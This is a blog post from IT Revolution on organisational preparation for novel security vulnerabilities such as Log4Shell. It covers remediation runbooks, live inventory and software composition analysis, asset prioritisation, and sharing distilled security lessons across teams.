Skip to content

October 7, 2022

Novel Security Vulnerabilities: How to Prepare for and Prevent Attacks

By IT Revolution

When a new vulnerability becomes known to the public, it launches a race between the inevitable cyber attacks and the speed of remediating the vulnerability. One challenge is the large asymmetry between the resources required to hack your organization and the resources required to secure it. While most organizations favor predictability and prevention, both are not always possible in a world of unknown threats. To build a safety net around incomplete prevention, we must continuously prepare for the unpredictable by minimizing the phases in our remediation life cycles.

Remediation Runbook

“All hands on deck” understates that the cost of poorly organizing could be brand-destroying or lead to extinction-level events. High-performing organizations set expectations and provide a clear runbook detailing which people and teams play the vital roles of maintaining or pursuing order in remediation.

Elements of a runbook could include the following:

  • How to facilitate and coordinate incidents upon vulnerability declaration. This governing body (typically a cyber incident response team) has authority and the ability to determine threat level and response required.
  • Urgency prioritization (judgment calls on simultaneously announced threats).
  • Strategy for inventory collection and assessment.
  • Strategy on mitigation and/or remediation at various layers of infrastructure.

Infrastructure Inventory

One of the anchors of your remediation journey will be the collection and assessment of vulnerable infrastructure. If the inventory comes from a configuration management database, ensure it’s actively updated, accurate, and maintained. This inventory of endpoints should come from a dynamically generated and updated list based on reality. With this type of list, exploits can be tested in real time by a Red Team or, even better, by the teams who own the application(s) themselves. By prioritizing the endpoints that we know are vulnerable, it allows us to stay focused on what is at the most risk.

Another useful inventory collection can be to view a regularly published inventory of the code software composition analysis (SCA) from each of your deployment pipelines. (This assumes that all CI/CD pipelines include a job to inventory components used to build your products. If you don’t yet have such a job, look into a Software Bills of Materials.). Reflecting aggregated SCA inventories can help to indicate how widespread open-source software is in your business and critical systems. This can spur a few thought-provoking questions:

  • Did we understand the ongoing cost of open-source software?
  • Have we vetted all the sources of the open-source code we use?
  • Can we standardize our overall use to mitigate our risk?

Asset Prioritization

You can prioritize your digital inventory by attributes such as exposure, criticality, production only, and customer data. External-facing endpoints are the most obvious to set as high priority, but there are many instances where purely internal-facing endpoints are a high priority as well. It is also beneficial to focus on your company’s predetermined “crown jewel” assets—that is, the most critical assets for your business. By establishing this ordered list ahead of time, you ensure that your teams already know what they need to protect first before they get to work.

Remediation Execution

In many cases, you can protect highly available services with multiple layers of protection. For example, Log4Shell can be thwarted at the ingress layer by detecting the signature of the exploit and rejecting its request before it gets to the vulnerable inner application. Performing threat modeling during the design phase of an application can help establish short-term options in case your other options are not as expedient to change.

Post-Remediation Reassessment

Once we enter the reflection stage of addressing a vulnerability (after remediation), we can review the original reasons why vulnerable libraries and modules were used in the first place. This should spur discussions on whether previously held assumptions and constraints still hold true. Many organizations’ feelings about open-source software have shifted from “the more we can leverage, the better” to “every dependency brings risk and future cost.” As the Log4Shell experience shows, free software is anything but free.

For organizations that embrace continuous improvement, the lessons learned from remediating a vulnerability go into future road maps, design decisions, or operational changes. Here are some examples of policies born from vulnerability remediation:

  • Establish nightly SCA scans
  • Only use open-source components with support contracts
  • Detect excess database queries in real-time and report anomalies

Ideally, you’ll experiment with tactical approaches to mitigate the exposure to future risk. By assessing risk, we have another lens through which to view the trade-offs of open-source software. These discussions should heavily influence make-versus-buy decisions, technical architecture, and team topology layout.

All dimensions associated with the response to a vulnerability typically present opportunities for improvement. Whether it’s people, processes, or tools, our organizations likely have areas in which we can prepare and evaluate our ability to respond to new and innovative threats to our businesses.

Organizational Learning

As security threats emerge, our organizations must continually learn and adapt. Our adversaries certainly do! A foundational principle of DevOps is that organizations that create adaptive capacity and learn from both incidents and near misses will outperform those that isolate responses to silos. Such learning happens as a result of deliberate structures that promote feedback and introspection.

As an industry, we have created learning loops that embrace software development and IT operations. Motivated by successful results, we have extended those loops to encompass finance and security. We need to further extend these loops to include legal and data privacy teams as other aspects of governance.

Challenges with Security Learning

When we touch on legal and data privacy matters, however, corporate risk management can impede learning. Customers, regulators, and shareholders have all used a company’s admission of a security incident as cause for legal action. In such cases, knowing the details of an incident means you might be subpoenaed. You may be called on to testify in court about the incident. Your device and account may be subject to legal discovery. Even receiving an email about an incident can cause your account to be subject to a legal hold. A company has legitimate reasons to limit the number of people who could be dragged into these expensive and time-consuming processes.

Separately, if the incident involves malware or extortion, the company will not want to appear as a soft target. That would induce other attackers to make attempts at the company. The entry point from the first attack may be closed by this time, but a concerted effort by attackers would likely reveal other entry points.

We must also think about the people involved. Humans are not good at estimating risk, even at the best of times. As we saw in our section on the human response to a security event, people under threat will experience high levels of stress and fear, which can lead them to catastrophize situations and engage in self-protection. The instinct to “hunker down” and defend against a potentially career-ending, brand-destroying, or extinction-level event can also cause people to clamp down on sharing information. While natural, this instinct also breaks the learning loop.

In response to risks, organizations may choose to treat information about security threats and responses as “state secrets.” These are siloed within the company. Oversight may even be delegated to an outside counsel. Such structures limit learning to particular silos within the company. The security, data privacy, or legal teams may know about incidents that others never even hear about. Developers will not learn about the nature of threats facing their software; platform teams may not be aware of supply-chain attacks, and so on.

Distilled Security Learning

Learning is a team sport. It works best when players with different skills are able to interact, compare experiences, and create solutions together. To create such a learning organization, companies should apply many of the same lessons from DevOps:

  • Use blameless post-mortems to gather information from many parties.
  • Look for multiple contributing factors; don’t stop at a single “root cause.”
  • Examine the security threats that didn’t cause harm to understand what layers of protection succeeded.
  • How shall we reconcile the need for feedback and learning with the need to partition and manage legal and financial risk?

Unexplained Security Mandates

A common response is for a small group of people who are “in the know” to issue mandates and standards that the rest of the organization must simply obey. This does not encourage learning! The people receiving the mandates will not understand the motivation behind them and are likely to resist, for at least two reasons: First, it is human nature to resent or resist dictates that appear arbitrary or capricious. Second, the teams called on to implement the mandates are themselves subject to delivery pressure. This results in the common conflict between “security wants X” while “the customer (or product manager) wants Y.” The team plays the role of the rope in this tug-of-war. They can see the value created by building the feature road map but can’t know what value is protected by the seemingly ungrounded security mandate.

Balancing Risk with Learning

We suggest the following if full security incident and threats details must be isolated for risk management:

  • A limited number of technically knowledgeable people should be included in the team that has the full details.
  • Those with the full information should apply those lessons about learning mentioned above.
  • That subteam is responsible for distilling the essence of the incident in a way that explains the nature of the threat and what protective response is necessary (coding patterns, replacement of libraries, connectivity restrictions, etc.).
  • The technology community should broadly discuss the “distilled” version of the incident.
  • The technology community may very well find alternative solutions that the smaller group did not. The technical subteam from the incident review brings that additional knowledge back to the whole team.

This is intentionally a compromise approach, attempting to trade off risk with learning effectiveness. If full information about vulnerabilities and remediations can be shared broadly across the organization, the organization will receive greater benefits.

Conclusion

The cost of defending against security vulnerabilities will continue to rise. As it does, the asymmetry between the cost of defense and the cost of attack will worsen. Organizations must be prepared to adapt to novel classes of security vulnerability, as there is no evidence that the rate of discovery will decrease.

We can derive some lessons from the Log4Shell vulnerability uncovered in December 2021. As we saw with Example 3, some organizations that relied on static databases of software composition had to work through inaccurate, misleading, or disputed information. Those that were able to inventory live systems moved more rapidly into mitigation and remediation.

When a novel vulnerability arises, we must consider the human psychological response as well as the technical and sociotechnical responses. Humans under stress will react in predictable ways, as described by the Kübler-Ross Change Curve. The early stages of this curve—shock, denial, frustration, and depression—are not productive in terms of mitigating vulnerabilities. We can improve the organization’s outcomes by helping people move through those stages to the more useful ones—experiment, decision, and integration—more smoothly and rapidly. However, when it comes to security threats, we must also be aware that we are asking people to progress at a ridiculously accelerated pace: hours and days instead of weeks and months.

Organizations that practice shared ownership of responsibilities are better able to reteam dynamically to meet the challenges of novel vulnerabilities than those that rely on static organizational structures and processes. We recommend the same culture of shared responsibility, broad communication, and iterative adaptation for security vulnerabilities as we do for operational incidents.

Organizations can prepare before a vulnerability strikes through deliberate practice and knowledge sharing. We recommend creating, publishing, and practicing runbooks about security responses that clarify certain needed roles. These roles are not exclusive or comprehensive. Rather, they serve to ensure that communications have a focal point, response measures are prioritized, and everyone knows who is organizing the collective responses. These roles may be reassigned to different people during the event, but the roles themselves should be understood in advance.

The threats to our systems go beyond network-based attacks at runtime to encompass the software development process itself. We have seen attacks against software supply chains, open-source components, build systems, and other portions of the software development and delivery ecosystem. As these classes of attack proliferate, we see a broad shift in developer attitudes toward dependencies and use of open-source components. Viewpoints are shifting from “reusing other peoples’ code is better than writing new code” to a more balanced understanding of the ongoing cost of incorporating a deep tree of constantly shifting dependencies. Organizations are becoming more sensitive to the long-term carrying cost of open-source components.

Organizational learning about security vulnerabilities has some special considerations that lead some companies to partition or silo information. This partitioning can reduce risk of legal exposure. At the same time, however, the lost learning potential among development and operations personnel means that future vulnerabilities and patterns of vulnerabilities may be more damaging than they otherwise could be. We recommend sharing the essential nature of the vulnerabilities and prevention mechanisms through distilled security learning, even when the specific details about affected systems, users, or customers cannot be shared.

With security vulnerabilities, as with other risks to our companies, we recommend that you assess your specific context and adapt these patterns and practices to fit your context. As you do so, continue to apply the core principles of iterative learning and adaptation, culture of knowledge sharing and collaboration, and continuous delivery of value.

Stay safe out there!

- About The Authors
Avatar photo

IT Revolution

Trusted by technology leaders worldwide. Since publishing The Phoenix Project in 2013, and launching DevOps Enterprise Summit in 2014, we’ve been assembling guidance from industry experts and top practitioners.

Follow IT on Social Media

No comments found

Leave a Comment

Your email address will not be published.



Jump to Section

    More Like This

    What to Expect at DevOps Enterprise Summit Virtual – US 2022
    By Gene Kim

    I loved the DevOps Enterprise Summit Las Vegas conference! Holy cow. We held our…

    Map Camp: Weird Mapping – How to Create a Revolution
    By David Anderson

    A version of this post was originally published at TheServerlessEdge.com. Dave Anderson, author of…

    Serverless Myths
    By David Anderson , Michael O’Reilly , Mark McCann

    The term “serverless myths” could also be “modern cloud myths.” The myths highlighted here…

    What is the Modern Cloud/Serverless?
    By David Anderson , Michael O’Reilly , Mark McCann

    What is the Modern Cloud? What is Serverless? This post, adapted from The Value…